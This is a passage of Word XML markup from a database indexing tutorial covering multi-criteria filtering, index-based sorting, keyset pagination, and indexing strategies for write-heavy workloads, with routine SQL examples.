        <w:t>CREATE INDEX idx ON documents(tenant_id, type, created_at);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24941498" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5FE6DA31" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- This ensures ALL queries are scoped to the tenant's data efficiently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D74E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.5 Search / Filtering with Multiple Optional Criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54897E81" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6FF7E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Users can filter by any combination of: category, price range, brand, rating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22445C71" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT * FROM products </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339B2275" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">WHERE category = 'electronics' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6185C050" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  AND price BETWEEN 100 AND 500 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632FA6C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  AND brand = 'Apple' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E522C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  AND rating &gt;= 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44434411" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> You can't create a composite index for every possible combination (exponential explosion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63971119" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3577CC84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple single-column indexes + bitmap scan (PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDB506" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46958C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_category ON products(category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E40B0E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_price ON products(price);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288E0D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_brand ON products(brand);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28268042" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_rating ON products(rating);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681329E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="423AAF00" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- PostgreSQL can combine multiple indexes using BitmapAnd/BitmapOr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60585C0E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choose the most selective filter as the leading column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D062BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>If brand = 'Apple' filters to 5% of data → lead with brand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D69152D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>If category = 'electronics' filters to 30% → don't lead with it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E2661" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1474"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use a specialized search engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (Elasticsearch) for complex multi-faceted filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF33892" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.6 Sorting Without Explicit Sort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE1101" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F36A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query with ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37902545" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM events WHERE user_id = 42 ORDER BY timestamp DESC LIMIT 50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF28CED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0715372B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- If index is (user_id, timestamp DESC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F222A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- → Index returns rows already sorted → no explicit sort needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B27EC5C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- → Just scan first 50 entries → extremely fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A345CA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="33B90AFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- If index is (user_id) only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE72CA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- → Find all rows for user_id=42 (could be thousands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA8EAF8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- → Sort ALL of them by timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4AFFF1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- → Return first 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A497DD7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- → Much slower (sort is expensive for large result sets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D9145" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.7 Pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366B011F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216E23F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- OFFSET-based (common but slow for deep pages):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F25884" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM products ORDER BY id LIMIT 20 OFFSET 10000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263A7A53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Must scan and discard 10,000 rows → O(OFFSET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7388BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6751892F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Keyset pagination (fast for any depth):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E08B7B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM products WHERE id &gt; 10000 ORDER BY id LIMIT 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C2FE2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>-- Index on (id) → seek directly to id &gt; 10000 → scan 20 rows → O(1) regardless of page depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A45D37C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always prefer keyset pagination</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> for large tables. It uses the index to jump directly to the starting point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF028E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="09C5B012">
          <v:rect id="_x0000_i5330" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A1D881" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Indexing for Write-Heavy Workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB9B51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 The Write Amplification Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D822CB7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA74D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table with 5 indexes, 10,000 inserts/sec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74607E5E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Heap writes: 10,000/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DCD36F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index writes: 5 × 10,000 = 50,000/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A829C3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Total I/O operations: 60,000/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56C88C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3858913B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Each index write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C84D44" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Find correct leaf page (read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748F275" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Write new entry (write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A5AA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Possibly split page (additional reads/writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4A518" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE36D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Total disk operations: 60,000 reads + 60,000 writes = 120,000 IOPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A23D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SSD IOPS limit: ~100,000 random IOPS → BOTTLENECK!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D5A6D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Strategies for Write-Heavy Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2DC58" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Fewer indexes (obvious but important):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5BE027" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1475"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Only index what queries actually need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B31D3F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1475"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Drop unused indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F75D500" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1475"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Combine overlapping indexes (if you have index on (A) and on (A, B), drop the index on (A)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679360B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Bulk loading (disable indexes during load):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031B240F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434301AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>-- Drop indexes → bulk insert → rebuild indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA44CD2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>DROP INDEX idx1, idx2, idx3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4624189D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>COPY large_table FROM '/data/import.csv';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1107B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx1 ON ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C722987" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx2 ON ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B02125" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Building index once over sorted data is much faster than maintaining it during random inserts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F46114" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. LSM-Tree based storage (RocksDB, Cassandra):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D37E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Writes are append-only (sequential) → extremely fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96414E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Index (SSTable) is built during compaction (background, sequential).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51542381" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1476"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Trade: reads are slightly slower (check multiple levels).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2E15C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Delayed/async indexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC4390" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1477"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Write data immediately (unindexed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8CD8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1477"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Build/update indexes asynchronously in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51222C5B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1477"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Acceptable when queries can tolerate brief staleness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C7767" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Partial indexes (index only what's queried):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D63D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB01A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Only 5% of orders are 'pending', and those are the only ones queried frequently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037B040B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON orders(customer_id, created_at) WHERE status = 'pending';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156B918" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- 95% of inserts (non-pending) don't touch this index at all!</w:t>
      </w:r>
    </w:p>
